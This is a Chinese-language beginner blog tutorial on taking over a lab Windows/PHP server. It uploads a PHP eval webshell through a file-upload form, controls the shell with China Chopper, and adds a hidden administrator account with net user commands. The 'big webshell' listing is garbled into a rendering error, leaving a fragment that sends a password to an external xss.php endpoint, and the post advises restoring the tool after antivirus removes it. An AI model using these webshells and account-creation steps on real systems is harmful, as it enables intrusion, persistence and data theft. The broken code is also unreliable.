大家好,这是我的第一篇博客,如有问题的话请在下方留言!
如何通过靶机ip来获取目标数据库
靶机ip:192.168.*.*
先进行访问以下靶机ip看看是一个什么样的页面,正常情况下需要在打开页面后检查一下,一般在页面中会有遗留的信息在里面(仔细找一下),在这里我就用我之前所搭建的一个win2008(环境:php5.4+mysql+win2008r2)来做一下演示。
我现在将靶机ip写入到host文件中用www.a.com来代替
下图是一个简易的上传文件页面
再上传文件的时候我需要植入一个木马我推荐的有两种:php一句话木马 /php大马
php一句话木马:
<?php @eval($_POST[value]);?>
php大马:
<?php
KaTeX parse error: Expected 'EOF', got '&' at position 141: …/xss.php?do=api&̲id=c7rL&locatio…password.’"/>’;
下面我们先将php一句话木马/php大马生成一个php文件如下图:
eval:
eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
@eval($_POST[value])通俗的将也就是将你所传入的文件给返回出相应的路径来;
将生成的a.php文件传入
点击上传后返回img/a.php,这个img指的是存储的路径;获取到这个存储路径后,那下面我们就需要借助一样东西“中国菜刀”
将菜刀下下来之后(会被电脑拦截删除,再恢复一下就行),点击运行菜刀
右键进行添加,将www.a.com/img/a.php放入到url,后面的地方传的value就是之前a.php中的value,点击添加;如下图
双击我们所添加的www.a.com/img/a.php会进入下面的页面
这个时候我们就可以去找我们想要的东西去了。
如果你想要远程能够登陆上去的话,就需要在上一张图上选中www.a.com/img/a.php进行右键点击虚拟终端,会呈现如下图
然后我们来查询一下有几个用户输入命令net user
然后我们在给自己添加一个用户,输入命令net user 用户名 密码 /add;再查询一下
发现就有了,然后我们在给这个用户添加一下权限,把他分配到administrator组(win默认最高)里面去(输入命令:net localgroup administrator min /add),这样我们就能远程访问了
到了这一步,我想各位想要获取什么应该不是很难了吧,
如果你想创建隐藏账户的话只需要在创建用户的命令上加上一个$符号即可net user 用户名 $ 密码 /add;
如有讲述的不周到的地方,请各位多多指教!谢谢